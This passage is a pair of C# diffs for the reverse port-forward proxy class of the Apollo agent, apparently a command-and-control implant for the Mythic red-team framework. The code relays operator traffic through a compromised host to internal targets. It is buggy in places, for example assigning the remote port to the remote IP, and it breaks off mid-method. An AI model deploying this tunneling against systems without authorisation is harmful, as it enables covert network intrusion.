+using System.CodeDom.Compiler;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Security.Cryptography.X509Certificates;
+using System.Net.Security;
+using Apollo.RPortFwdProxy.Classes;
+using Mythic.Structs;
+using System.Runtime.Serialization;
+using System.Collections;
+using Apollo.CommandModules;
+using System.Windows.Forms;
+using System.Runtime.Remoting.Contexts;
+using static Utils.DebugUtils;
+using static Utils.ByteUtils;
+using Utils.ErrorUtils;
+using Apollo.SocksProxy.Enums;
+using Apollo.SocksProxy.Structs;
+
+namespace Apollo.RPortFwdProxy.Classes
+{
+    public class ProxyConnection
+    {
+
+        public string MythicPort;
+        public string RemotePort;
+        public string RemoteIp;
+
+
+        //public Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>> messages_back = new Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>>();
+        public Dictionary<string, Queue> operatorMapQueue = new Dictionary<string, Queue>();
+        public Dictionary<string, Socket> operatorMapConn = new Dictionary<string, Socket>();
+        public Dictionary<String, List<String>> messages_back = new Dictionary<String, List<String>>();
+
+        public static Thread operatorDispatchDatagram;
+
+        public int locker = 0;
+
+        private static Random rnd = new Random();
+
+        private Queue requestData = new Queue();
+        private Queue syncRequestData;
+
+        private Queue responseData = new Queue();
+        private Queue syncResponseData;
+
+        private bool exited = false;
+        public int ServerID { get; private set; }
+        public Socket ClientConnection { get; private set; } = null;
+        public AddrSpec Bind { get; private set; } = new AddrSpec();
+
+        private Thread WriteThread = null;
+        private Thread ReadThread = null;
+
+        private readonly ManualResetEvent exitEvent = new ManualResetEvent(false);
+
+        public delegate void DisconnectEvent(int serverID);
+        public DisconnectEvent OnDisconnect { get; private set; }
+
+
+
+        public string IPAddress { get; private set; } = "";
+        private static int MESSAGE_SIZE = 512000;
+
+        public const int ConnectCommand = 1;
+        public const int NoAuth = 0;
+        public const int socks5Version = 5;
+        private static System.Net.IPAddress localhostIPAddr = System.Net.IPAddress.Parse("127.0.0.1");
+
+        public ProxyConnection(string port, string rport, string rip)
+        {
+            MythicPort = port;
+            RemotePort = rport;
+            RemoteIp = rport;
+
+            operatorDispatchDatagram = new Thread(() => DispatchToOperators());
+        }
+
+        public string GetConfs()
+        {
+            return "Local Port: " + MythicPort + ", Remote Port: " + RemotePort + ", Remote IP" + RemoteIp;
+        }
+
+        public void StopForward()
+        {
+            foreach (KeyValuePair<string, Queue> entry in operatorMapQueue)
+            {
+                lock (operatorMapConn)
+                {
+                    operatorMapConn[entry.Key].Close();
+                }
+                lock (operatorMapQueue)
+                {
+                    operatorMapQueue[entry.Key].Clear();
+                }
+            }
+        }
+
+        private void DispatchToOperators()
+        {
+
+            foreach (KeyValuePair<string, Queue> entry in operatorMapQueue)
+            {
+                if (operatorMapConn.ContainsKey(entry.Key) == false)
+                {
+                    Socket new_operatorconn = initConn();
+                    operatorMapConn[entry.Key] = new_operatorconn;
+                }
+
+                if (entry.Value.Count > 0)
+                {
+                    lock (operatorMapQueue[entry.Key])
+                    {
+                        string base64data = (string)operatorMapQueue[entry.Key].Dequeue();
+                        byte[] data = Convert.FromBase64String(base64data);
+                        operatorMapConn[entry.Key].Send(data);
+                    }
+                }
+
+            }
+            // keep reading from operatorMapQueue and send to operatorMapConn
+
+        }
+
+        public void AddDatagramToQueueProx(Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> msgs)
+        {
+            //KeyValuePair<string, ProxyConnection> entry
+            foreach (KeyValuePair<String, Dictionary<String, Dictionary<String, List<String>>>> rport_dict in msgs)
+            {
+                foreach(KeyValuePair<String, Dictionary<String, List<String>>> rip_dict in rport_dict.Value)
+                {
+                    foreach(KeyValuePair<String, List<String>> entry in rip_dict.Value)
+                    {
+                        string operatorId = entry.Key;
+                        lock (operatorMapQueue[entry.Key])
+                        {
+                            foreach (string base64data in entry.Value)
+                            {
+                                operatorMapQueue[entry.Key].Enqueue(base64data);
+                            }
+                        }
+                    }
+                }
+            }
+        }
+
+        // TODO
+        public Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>GetMessagesBack()
+        {
+            while (locker == 1)
+            {
+                System.Threading.Thread.Sleep(1);
+            }
+            locker = 1;
+            Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> temp_dict1 = new Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>();
+            Dictionary<String, Dictionary<String, List<String>>> temp_dict3 = new Dictionary<String, Dictionary<String, List<String>>>();
+            Dictionary<String, List<String>> temp_dict2 = new Dictionary<String, List<String>>();
+
+            foreach (KeyValuePair<string, Socket> entry in operatorMapConn)
+            {
+                string operatorId = entry.Key;
+                temp_dict2[operatorId] = messages_back[entry.Key];
+            }
+            temp_dict3[RemoteIp] = temp_dict2;
+            temp_dict1[RemotePort] = temp_dict3;
+            messages_back = new Dictionary<String, List<String>>();
+            locker = 0;
+            return temp_dict1;
+        }
+
+        public void ReadFromTarget()
+        {
+
+            while (locker == 1)
+            {
+                System.Threading.Thread.Sleep(1);
+            }
+            locker = 1;
+            foreach (KeyValuePair<string, Socket> entry in operatorMapConn)
+            {
+                byte[] data = new byte[8192];
+                int size_data = entry.Value.Receive(data);
+                byte[] trimmed_data = data.Take(size_data).ToArray();
+                string data_Base64 = Convert.ToBase64String(trimmed_data);
+                if (messages_back.ContainsKey(entry.Key) == false)
+                {
+                    List<String> message_list = new List<String>();
+                    messages_back[entry.Key] = message_list;
+                }
+                messages_back[entry.Key].Add(data_Base64);
+            }
+            locker = 0;
+        }
+
+        public Socket initConn()
+        {
+            IPEndPoint remoteEPC2 = new IPEndPoint(System.Net.IPAddress.Parse(RemoteIp), Convert.ToInt32(RemotePort));
+            Socket socketOperator = new Socket(System.Net.IPAddress.Parse(RemoteIp).AddressFamily, SocketType.Stream, ProtocolType.Tcp);
+            socketOperator.Connect(remoteEPC2);
+            return socketOperator;
+        }
+
+        private Request ParseAddrSpec(byte[] data)
+        {
+            int dataIndex = 0;
+            int headerIndex = 0;
+            byte[] header = new byte[3];
+            byte[] address = null;
+            IPAddress targetIP = null;
+            int targetPort;
+            AddrSpec addrSpec = new AddrSpec() { FQDN = "", IP = null, Port = -1 };
+            SocksError errorResponse;
+            if (data.Length <= 1)
+            {
+                throw new SocksException("Datagram was an invalid length.", SocksError.InvalidDatagram);
+            }
+            if (data.Length < 3)
+            {
+                throw new SocksException("Datagram was an invalid length.", SocksError.InvalidDatagram);
+            }
+
+            Array.Copy(data, header, 3);
+            dataIndex += 3;
+            // gonna assume this means fail to read header
+            if (header[0] != socks5Version)
+            {
+                throw new SocksException($"Got header frame requesting invalid SOCKS version {header[0]}.", SocksError.CommandNotSupported);
+            }
+            AddressType ipType = (AddressType)data[dataIndex];
+            dataIndex += 1;
+            switch (ipType)
+            {
+                case AddressType.IPv4Address:
+                    address = new byte[4];
+                    Array.Copy(data, dataIndex, address, 0, 4);
+                    targetIP = new IPAddress(address);
+                    dataIndex += 4;
+                    addrSpec = new AddrSpec()
+                    {
+                        FQDN = "",
+                        IP = targetIP
+                    };
+                    break;
+                case AddressType.IPV6Address:
+                    address = new byte[16];
+                    Array.Copy(data, dataIndex, address, 0, 16);
+                    targetIP = new IPAddress(address);
+                    dataIndex += 16;
+                    addrSpec = new AddrSpec()
+                    {
+                        FQDN = "",
+                        IP = targetIP,
+                    };
+                    break;
+                case AddressType.FQDNAddress:
+                    int addrLength = data[dataIndex];
+                    dataIndex += 1;
+                    byte[] fqdnBytes = new byte[addrLength];
+                    Array.Copy(data, dataIndex, fqdnBytes, 0, addrLength);
+                    dataIndex += addrLength;
+                    string fqdn = Encoding.UTF8.GetString(fqdnBytes);
+                    try
+                    {
+                        var ipEntry = Dns.GetHostEntry(fqdn);
+                        if (ipEntry.AddressList.Length == 0)
+                            break;
+                        foreach (var ipaddr in ipEntry.AddressList)
+                        {
+                            if (ipaddr.ToString().Contains("."))
+                            {
+                                targetIP = ipaddr;
+                                break;
+                            }
+                        }
+                        if (targetIP == null)
+                            targetIP = ipEntry.AddressList[0];
+                        addrSpec = new AddrSpec()
+                        {
+                            FQDN = fqdn,
+                            IP = targetIP
+                        };
+                        break;
+                    }
+                    catch (Exception ex)
+                    {
+                        //DebugWriteLine($"Error while resolving FQDN: {ex.Message}");
+                        //if (ByteSequenceEquals(data, new byte[] { 5, 1, 0, 5}) || ByteSequenceEquals(data, new byte[] { 5,2,0,2}))
+                        //{
+                        //    var msg = new SocksDatagram()
+                        //    {
+                        //        server_id = conn.ServerID,
+                        //        data = Convert.ToBase64String(new byte[] { 5, 0 })
+                        //    };
+                        //    AddMythicMessageToQueue(msg);
+                        //}
+                        //new Thread(() => RemoveProxyConnection(conn)).Start();
+                        break;
+                    }
+                default:
+                    //DebugWriteLine("AddrType was not IPv4, IPv6, or FQDN!");
+                    //if (ByteSequenceEquals(data, new byte[] { 5, 1, 0, 5 }) || ByteSequenceEquals(data, new byte[] { 5, 2, 0, 2 }))
+                    //{
+                    //    var msg = new SocksDatagram()
+                    //    {
+                    //        server_id = conn.ServerID,
+                    //        data = Convert.ToBase64String(new byte[] { 5, 0 })
+                    //    };
+                    //    AddMythicMessageToQueue(msg);
+                    //}
+                    //new Thread(() => RemoveProxyConnection(conn)).Start();
+                    break;
+            }
+            if (targetIP == null)
+            {
+                throw new SocksException(SocksError.AddrTypeNotSupported);
+            }
+            if (data.Length < (dataIndex + 2))
+            {
+                throw new SocksException(SocksError.ServerFailure);
+            }
+
+            byte[] portBytes = new byte[2];
+            Array.Copy(data, dataIndex, portBytes, 0, 2);
+            dataIndex += 2;
+            targetPort = ((int)portBytes[0] << 8) | (int)portBytes[1];
+            addrSpec.Port = targetPort;
+
+            Request request = new Request()
+            {
+                Version = socks5Version,
+                Command = header[1],
+                DestAddr = addrSpec,
+                //BufCon = conn
+            };
+            int clientPort = rnd.Next(60000, 65536);
+            AddrSpec clientAddr = new AddrSpec()
+            {
+                FQDN = "",
+                IP = System.Net.IPAddress.Parse("127.0.0.1"),
+                Port = clientPort
+            };
+
+            request.RemoteAddr = clientAddr;
+            IPAddress destIPAddr;
+            if (request.DestAddr.FQDN != "")
+            {
+                if (request.DestAddr.IP == null)
+                {
+                    //DebugWriteLine("About to resolve FQDN");
+                    var dnsEntry = Dns.GetHostEntry(request.DestAddr.FQDN);
+                    if (dnsEntry.AddressList.Length == 0)
+                    {
+                        throw new SocksException(SocksError.HostUnreachable);
+                    }
+                    request.DestAddr.IP = dnsEntry.AddressList[0];
+
+                }
+            }
+
+            return request;
+        }
+
+        private bool DispatchRequest(Request request)
+        {
+            bool bRet = false;
+            switch (request.Command)
+            {
+                case ConnectCommand:
+                    var bind = new AddrSpec();
+                    int bindPort = rnd.Next(65000, 65536);
+                    IPEndPoint localEndpoint = new IPEndPoint(localhostIPAddr, bindPort);
+                    bind.FQDN = "";
+                    bind.IP = localhostIPAddr;
+                    bind.Port = bindPort;
+                    Socket target;
+                    try
+                    {
+                        if (request.DestAddr.IP.AddressFamily == AddressFamily.InterNetwork)
+                            target = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
+                        else
+                            target = new Socket(AddressFamily.InterNetworkV6, SocketType.Stream, ProtocolType.Tcp);
+                    }
+                    catch (Exception ex)
+                    {
+                        throw new SocksException("Failed to create socket for address.", SocksError.ConnectionRefused);
+                    }
+                    //target.Bind(localEndpoint);
+
+                    //TcpClient target = new TcpClient(localEndpoint);
+                    try
+                    {
+                        target.Connect(request.DestAddr.IP.ToString(), request.DestAddr.Port);
+                    }
+                    catch (Exception ex)
+                    {
+                        throw new SocksException($"Failed on client connect to {request.DestAddr.IP.ToString()}", SocksError.HostUnreachable, ex);
+                    }
+                    bRet = true;
+                    //DebugWriteLine($"Successfully connected to {request.DestAddr.IP.ToString()}");
+                    ClientConnection = target;
+                    Bind = bind;
+                    //var msgToSend = CreateFormattedMessageWithLength(SocksError.SuccessReply, bind, conn);
+                    //AddMythicMessageToQueue(msgToSend);
+                    //new Thread(() => conn.StartRelay()).Start();
+                    break;
+                default:
+                    throw new SocksException($"Command not supported: {request.Command}", SocksError.CommandNotSupported);
+            }
+            return bRet;
+        }
+
+
+        public bool EnqueueRequestData(byte[] data)
+        {
+            //DebugWriteLine($"{IPAddress} ({ServerID}) attempting to enqueue request data...");
+            syncRequestData.Enqueue(data);
+            //DebugWriteLine($"{IPAddress} ({ServerID}) request data successfully enqueued!");
+            return true;
+        }
+
+        public byte[] GetRequestData()
+        {
+            byte[] data;
+            while (!exited)
+            {
+                if (syncRequestData.Count > 0)
+                {
+                    data = (byte[])syncRequestData.Dequeue();
+                    return data;
+                }
+            }
+            return null;
+        }
+
+        public void Close()
+        {
+            // Something called close twice, so let's just wait for the other thread to finish.
+            if (exited)
+                exitEvent.WaitOne();
+            // Initialize close sequence
+            else
+            {
+                exited = true;
+                //if (ReadThread != null && WriteThread != null)
+                //{
+                //    if (ReadThread.IsAlive || WriteThread.IsAlive)
+                //    {
+                //        ReadThread.Join();
+                //        WriteThread.Join();
+                //    }
+                //}
+                // Kill the socket.
+                if (ClientConnection != null)
+                {
+                    try
+                    {
+                        ClientConnection.Close();
+                    }
+                    catch (Exception ex)
+                    {
+                        //DebugWriteLine($"Error closing socket to {IPAddress}: {ex.Message}");
+                    }
+                }
+                // Remove everything.
+                OnDisconnect(this.ServerID);
+                // Notify other callers you can terminate.
+                exitEvent.Set();
+            }
+        }
+
+        public bool EnqueueResponseData(byte[] data)
+        {
+            //DebugWriteLine($"{IPAddress} ({ServerID}) attempting to enqueue response data...");
+            syncResponseData.Enqueue(data);
+            //DebugWriteLine($"{IPAddress} ({ServerID}) response data successfully enqueued!");
+            return true;
+        }
+
+
+    }
+}

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -33,48 +33,24 @@ namespace Apollo.RPortFwdProxy.Classes
         public string RemotePort;
         public string RemoteIp;
 
-
+        private object syncMapMsg = new Object();
+	private object syncMapConn = new Object();
         //public Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>> messages_back = new Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>>();
-        public Dictionary<string, Thread> operatorReadQueue = new Dictionary<string, Thread>();
         public Dictionary<string, Queue<String>> operatorMapQueue = new Dictionary<string, Queue<String>>();
-        public Dictionary<string, Socket> operatorMapConn = new Dictionary<string, Socket>();
-        public Dictionary<String, List<String>> messages_back = new Dictionary<String, List<String>>();
+        public Dictionary<string, Thread> operatorReadQueue = new Dictionary<string, Thread>();
+        
+        //public Dictionary<string, Object> queueLockerMsgBack = new Dictionary<string, Object>();
+        //public Dictionary<string, Object> queueLocker = new Dictionary<string, Object>(); 
+	public Dictionary<string, int> operatorState = new Dictionary<string, int>();
+	public Dictionary<string, Socket> operatorMapConn = new Dictionary<string, Socket>();
+        public Dictionary<String, Queue<String>> messages_back = new Dictionary<String, Queue<String>>();
 
         public static Thread operatorDispatchDatagram;
 
-        public int locker = 0;
-
         private static Random rnd = new Random();
 
-        private Queue requestData = new Queue();
-        private Queue syncRequestData;
-
-        private Queue responseData = new Queue();
-        private Queue syncResponseData;
-
         private bool exited = false;
-        public int ServerID { get; private set; }
-        public Socket ClientConnection { get; private set; } = null;
-        public AddrSpec Bind { get; private set; } = new AddrSpec();
-
-        private Thread WriteThread = null;
-        private Thread ReadThread = null;
-
-        private readonly ManualResetEvent exitEvent = new ManualResetEvent(false);
-
-        public delegate void DisconnectEvent(int serverID);
-        public DisconnectEvent OnDisconnect { get; private set; }
-
-
-
-        public string IPAddress { get; private set; } = "";
-        private static int MESSAGE_SIZE = 512000;
-
-        public const int ConnectCommand = 1;
-        public const int NoAuth = 0;
-        public const int socks5Version = 5;
-        private static System.Net.IPAddress localhostIPAddr = System.Net.IPAddress.Parse("127.0.0.1");
-
+        
         public ProxyConnection(string port, string rport, string rip)
         {
             MythicPort = port;
@@ -87,409 +63,189 @@ namespace Apollo.RPortFwdProxy.Classes
 
         public string GetConfs()
         {
-            return "Local Port: " + MythicPort + ", Remote Port: " + RemotePort + ", Remote IP" + RemoteIp;
+            return "[+] Local Port: " + MythicPort + " - Remote Port: " + RemotePort + " - Remote IP: " + RemoteIp;
         }
 
         public void StopForward()
         {
-            foreach (KeyValuePair<string, Queue<String>> entry in operatorMapQueue)
-            {
-                operatorDispatchDatagram.Abort();
-                lock (operatorReadQueue)
+	    List<string> operators = null;
+            lock(syncMapConn){
+		exited = true;
+                operators = new List<string>(operatorMapConn.Keys);
+	        foreach (string entry in operators)
                 {
-                    operatorReadQueue[entry.Key].Abort();
-                }
-                lock (operatorMapConn)
-                {
-                    operatorMapConn[entry.Key].Close();
-                }
-                lock (operatorMapQueue)
-                {
-                    operatorMapQueue[entry.Key].Clear();
-                }
+		    if (operatorMapConn[entry] != null){       
+                        try{ 
+			    operatorMapConn[entry].Shutdown(SocketShutdown.Both);
+		            operatorMapConn[entry].Close();
+		        }catch{}
+		        try{
+		            operatorMapQueue[entry].Clear();
+		        }catch{}
+		    }
+		}
             }
         }
 
         private void DispatchToOperators()
         {
-
-            foreach (KeyValuePair<string, Queue<String>> entry in operatorMapQueue)
-            {
-                if (operatorMapConn.ContainsKey(entry.Key) == false)
+            try{
+                while (!exited)
                 {
-                    Socket new_operatorconn = initConn();
-                    operatorMapConn[entry.Key] = new_operatorconn;
-                    Thread thread = new Thread(() => ReadFromTarget(entry.Key));
-                    operatorReadQueue[entry.Key] = thread;
-                    operatorReadQueue[entry.Key].Start();
-                }
-
-                if (entry.Value.Count > 0)
-                {
-                    lock (operatorMapQueue)
+		    List<string> operators = new List<string>(operatorMapQueue.Keys);
+		    
+		    while(operators.Count == 0){
+                        operators = new List<string>(operatorMapQueue.Keys);
+		        
+		    }
+		    foreach (string entry in operators)
                     {
-                        string base64data = (string)operatorMapQueue[entry.Key].Dequeue();
-                        byte[] data = Convert.FromBase64String(base64data);
-                        operatorMapConn[entry.Key].Send(data);
+                        if (operatorMapConn.ContainsKey(entry) == false)
+                        {
+			    lock(syncMapConn){
+		                operatorMapConn[entry] = null;
+			        Socket new_operatorconn = null;
+			        operatorMapConn[entry] = initConn();
+			    }
+			    if (operatorMapConn[entry] != null){
+                                operatorState[entry] = 0;
+      			        Thread thread = new Thread(() => ReadFromTarget(entry));
+                                operatorReadQueue[entry] = thread;
+		                operatorReadQueue[entry].Start();
+			    }
+			}
+			while (operatorMapQueue[entry].Count > 0)
+                        {
+                            if (operatorMapConn[entry] != null){
+				
+			        string base64data = "";
+			        base64data = (string)operatorMapQueue[entry].Dequeue();
+				
+			        byte[] data = Convert.FromBase64String(base64data);
+                                try{
+			            operatorMapConn[entry].Send(data);
+				    operatorState[entry] = 1;
+				}catch{
+				                                          
+                                        //operatorMapConn[entry].Shutdown(SocketShutdown.Both);
+				        //operatorMapConn[entry].Close();
+				    lock(syncMapConn){
+				        operatorMapConn[entry] = null;
+				    }
+				}
+                            } 
+			}
                     }
                 }
-
-            }
-            // keep reading from operatorMapQueue and send to operatorMapConn
-
+	    // keep reading from operatorMapQueue and send to operatorMapConn
+            }catch{ }
         }
 
         public void AddDatagramToQueueProx(Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> msgs)
         {
-            //KeyValuePair<string, ProxyConnection> entry
-            foreach (KeyValuePair<String, Dictionary<String, Dictionary<String, List<String>>>> rport_dict in msgs)
-            {
-                foreach(KeyValuePair<String, Dictionary<String, List<String>>> rip_dict in rport_dict.Value)
+            try{//KeyValuePair<string, ProxyConnection> entry
+                foreach (KeyValuePair<String, Dictionary<String, Dictionary<String, List<String>>>> rport_dict in msgs)
                 {
-                    foreach(KeyValuePair<String, List<String>> entry in rip_dict.Value)
+                    foreach(KeyValuePair<String, Dictionary<String, List<String>>> rip_dict in rport_dict.Value)
                     {
-                        string operatorId = entry.Key;
-                        lock (operatorMapQueue)
+                        foreach(KeyValuePair<String, List<String>> entry in rip_dict.Value)
                         {
-                            foreach (string base64data in entry.Value)
+                            if (!operatorMapQueue.ContainsKey(entry.Key))
                             {
-                                if (operatorMapQueue[entry.Key] == null){
-                                    operatorMapQueue[entry.Key] = new Queue();
-                                }
-                                if (!operatorMapQueue.ContainsKey(entry.Key)){
-                                    operatorMapQueue[entry.Key] = new Queue<String>();
-                                }
-                                operatorMapQueue[entry.Key].Enqueue(base64data);
-                            }
-                        }
-                    }
-                }
-            }
+                                operatorMapQueue[entry.Key] = new Queue<String>(); 
+	                    }
+			    
+                            string operatorId = entry.Key;
+                            foreach (string base64data in entry.Value)
+			    {
+			        operatorMapQueue[entry.Key].Enqueue(base64data);
+			    } 
+			}
+		    }
+		}
+	    }catch{}
         }
+    
 
         // TODO
-        public Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>GetMessagesBack()
+        public Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> GetMessagesBack()
         {
-            while (locker == 1)
-            {
-                System.Threading.Thread.Sleep(1);
-            }
-            locker = 1;
             Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> temp_dict1 = new Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>();
-            Dictionary<String, Dictionary<String, List<String>>> temp_dict3 = new Dictionary<String, Dictionary<String, List<String>>>();
-            Dictionary<String, List<String>> temp_dict2 = new Dictionary<String, List<String>>();
+            try{
+	        Dictionary<String, Dictionary<String, List<String>>> temp_dict3 = new Dictionary<String, Dictionary<String, List<String>>>();
+                Dictionary<String, List<String>> temp_dict2 = new Dictionary<String, List<String>>();
 
-            foreach (KeyValuePair<string, Socket> entry in operatorMapConn)
-            {
-                string operatorId = entry.Key;
-                temp_dict2[operatorId] = messages_back[entry.Key];
-            }
-            temp_dict3[RemoteIp] = temp_dict2;
-            temp_dict1[RemotePort] = temp_dict3;
-            messages_back = new Dictionary<String, List<String>>();
-            locker = 0;
+	        List<string> operators = new List<string>(operatorMapConn.Keys);
+               
+	        foreach (string entry in operators)
+                {
+	            string operatorId = entry;
+		    List<String> msgs = new List<String>();
+	            if (messages_back.ContainsKey(entry)){
+                        while(messages_back[entry].Count > 0)
+		        {
+		            msgs.Add(messages_back[entry].Dequeue());
+		        }
+		        temp_dict2[operatorId] = msgs;
+		    }
+                }
+
+                temp_dict3[RemoteIp] = temp_dict2;
+                temp_dict1[RemotePort] = temp_dict3;
+	    }catch {}
             return temp_dict1;
         }
 
         public void ReadFromTarget(string oper)
-        { 
-            byte[] data = new byte[8192];
-            int size_data = operatorMapConn[oper].Receive(data);
-            byte[] trimmed_data = data.Take(size_data).ToArray();
-            string data_Base64 = Convert.ToBase64String(trimmed_data);
-            if (messages_back.ContainsKey(oper) == false)
-            {
-                    List<String> message_list = new List<String>();
+        {
+	    while(operatorState[oper] == 0){
+                Thread.Sleep(100);
+	    }
+            lock(syncMapMsg){
+	        if (messages_back.ContainsKey(oper) == false)
+                {
+                    Queue<String> message_list = new Queue<String>();
                     messages_back[oper] = message_list;
-            }
-            messages_back[oper].Add(data_Base64);
-
-        }
-
+                }
+	    }
+	    while(exited == false){
+		try{ 
+	            byte[] data = new byte[8192];
+		    int size_data = 0;
+                    
+		    size_data = operatorMapConn[oper].Receive(data);
+		    
+		    byte[] trimmed_data = data.Take(size_data).ToArray();
+                    string data_Base64 = Convert.ToBase64String(trimmed_data);
+		    if(data_Base64 != ""){
+			lock(syncMapMsg){
+		            messages_back[oper].Enqueue(data_Base64);
+			}
+		    }
+		}catch(Exception ex){
+		    
+                    
+			//operatorMapConn[oper].Shutdown(SocketShutdown.Both);
+			//operatorMapConn[oper].Close();
+                    operatorMapConn[oper] = null;
+		    break;
+		}
+	    }	
+	}	    
+    	    
+	           
         public Socket initConn()
         {
-            IPEndPoint remoteEPC2 = new IPEndPoint(System.Net.IPAddress.Parse(RemoteIp), Convert.ToInt32(RemotePort));
-            Socket socketOperator = new Socket(System.Net.IPAddress.Parse(RemoteIp).AddressFamily, SocketType.Stream, ProtocolType.Tcp);
-            socketOperator.Connect(remoteEPC2);
-            return socketOperator;
+	    Socket socketOperator = null;
+            try{
+	    	IPEndPoint remoteEPC2 = new IPEndPoint(System.Net.IPAddress.Parse(RemoteIp), Convert.ToInt32(RemotePort));
+                socketOperator = new Socket(System.Net.IPAddress.Parse(RemoteIp).AddressFamily, SocketType.Stream, ProtocolType.Tcp);
+                socketOperator.Connect(remoteEPC2);
+	        return socketOperator;
+	    }catch(Exception ex){
+	        return socketOperator;
+	    }
         }
-
-        private Request ParseAddrSpec(byte[] data)
-        {
-            int dataIndex = 0;
-            int headerIndex = 0;
-            byte[] header = new byte[3];
-            byte[] address = null;
-            IPAddress targetIP = null;
-            int targetPort;
-            AddrSpec addrSpec = new AddrSpec() { FQDN = "", IP = null, Port = -1 };
-            SocksError errorResponse;
-            if (data.Length <= 1)
-            {
-                throw new SocksException("Datagram was an invalid length.", SocksError.InvalidDatagram);
-            }
-            if (data.Length < 3)
-            {
-                throw new SocksException("Datagram was an invalid length.", SocksError.InvalidDatagram);
-            }
-
-            Array.Copy(data, header, 3);
-            dataIndex += 3;
-            // gonna assume this means fail to read header
-            if (header[0] != socks5Version)
-            {
-                throw new SocksException($"Got header frame requesting invalid SOCKS version {header[0]}.", SocksError.CommandNotSupported);
-            }
-            AddressType ipType = (AddressType)data[dataIndex];
-            dataIndex += 1;
-            switch (ipType)
-            {
-                case AddressType.IPv4Address:
-                    address = new byte[4];
-                    Array.Copy(data, dataIndex, address, 0, 4);
-                    targetIP = new IPAddress(address);
-                    dataIndex += 4;
-                    addrSpec = new AddrSpec()
-                    {
-                        FQDN = "",
-                        IP = targetIP
-                    };
-                    break;
-                case AddressType.IPV6Address:
-                    address = new byte[16];
-                    Array.Copy(data, dataIndex, address, 0, 16);
-                    targetIP = new IPAddress(address);
-                    dataIndex += 16;
-                    addrSpec = new AddrSpec()
-                    {
-                        FQDN = "",
-                        IP = targetIP,
-                    };
-                    break;
-                case AddressType.FQDNAddress:
-                    int addrLength = data[dataIndex];
-                    dataIndex += 1;
-                    byte[] fqdnBytes = new byte[addrLength];
-                    Array.Copy(data, dataIndex, fqdnBytes, 0, addrLength);
-                    dataIndex += addrLength;
-                    string fqdn = Encoding.UTF8.GetString(fqdnBytes);
-                    try
-                    {
-                        var ipEntry = Dns.GetHostEntry(fqdn);
-                        if (ipEntry.AddressList.Length == 0)
-                            break;
-                        foreach (var ipaddr in ipEntry.AddressList)
-                        {
-                            if (ipaddr.ToString().Contains("."))
-                            {
-                                targetIP = ipaddr;
-                                break;
-                            }
-                        }
-                        if (targetIP == null)
-                            targetIP = ipEntry.AddressList[0];
-                        addrSpec = new AddrSpec()
-                        {
-                            FQDN = fqdn,
-                            IP = targetIP
-                        };
-                        break;
-                    }
-                    catch (Exception ex)
-                    {
-                        //DebugWriteLine($"Error while resolving FQDN: {ex.Message}");
-                        //if (ByteSequenceEquals(data, new byte[] { 5, 1, 0, 5}) || ByteSequenceEquals(data, new byte[] { 5,2,0,2}))
-                        //{
-                        //    var msg = new SocksDatagram()
-                        //    {
-                        //        server_id = conn.ServerID,
-                        //        data = Convert.ToBase64String(new byte[] { 5, 0 })
-                        //    };
-                        //    AddMythicMessageToQueue(msg);
-                        //}
-                        //new Thread(() => RemoveProxyConnection(conn)).Start();
-                        break;
-                    }
-                default:
-                    //DebugWriteLine("AddrType was not IPv4, IPv6, or FQDN!");
-                    //if (ByteSequenceEquals(data, new byte[] { 5, 1, 0, 5 }) || ByteSequenceEquals(data, new byte[] { 5, 2, 0, 2 }))
-                    //{
-                    //    var msg = new SocksDatagram()
-                    //    {
-                    //        server_id = conn.ServerID,
-                    //        data = Convert.ToBase64String(new byte[] { 5, 0 })
-                    //    };
-                    //    AddMythicMessageToQueue(msg);
-                    //}
-                    //new Thread(() => RemoveProxyConnection(conn)).Start();
-                    break;
-            }
-            if (targetIP == null)
-            {
-                throw new SocksException(SocksError.AddrTypeNotSupported);
-            }
-            if (data.Length < (dataIndex + 2))
-            {
-                throw new SocksException(SocksError.ServerFailure);
-            }
-
-            byte[] portBytes = new byte[2];
-            Array.Copy(data, dataIndex, portBytes, 0, 2);
-            dataIndex += 2;
-            targetPort = ((int)portBytes[0] << 8) | (int)portBytes[1];
-            addrSpec.Port = targetPort;
-
-            Request request = new Request()
-            {
-                Version = socks5Version,
-                Command = header[1],
-                DestAddr = addrSpec,
-                //BufCon = conn
-            };
-            int clientPort = rnd.Next(60000, 65536);
-            AddrSpec clientAddr = new AddrSpec()
-            {
-                FQDN = "",
-                IP = System.Net.IPAddress.Parse("127.0.0.1"),
-                Port = clientPort
-            };
-
-            request.RemoteAddr = clientAddr;
-            IPAddress destIPAddr;
-            if (request.DestAddr.FQDN != "")
-            {
-                if (request.DestAddr.IP == null)
-                {
-                    //DebugWriteLine("About to resolve FQDN");
-                    var dnsEntry = Dns.GetHostEntry(request.DestAddr.FQDN);
-                    if (dnsEntry.AddressList.Length == 0)
-                    {
-                        throw new SocksException(SocksError.HostUnreachable);
-                    }
-                    request.DestAddr.IP = dnsEntry.AddressList[0];
-
-                }
-            }
-
-            return request;
-        }
-
-        private bool DispatchRequest(Request request)
-        {
-            bool bRet = false;
-            switch (request.Command)
-            {
-                case ConnectCommand:
-                    var bind = new AddrSpec();
-                    int bindPort = rnd.Next(65000, 65536);
-                    IPEndPoint localEndpoint = new IPEndPoint(localhostIPAddr, bindPort);
-                    bind.FQDN = "";
-                    bind.IP = localhostIPAddr;
-                    bind.Port = bindPort;
-                    Socket target;
-                    try
-                    {
-                        if (request.DestAddr.IP.AddressFamily == AddressFamily.InterNetwork)
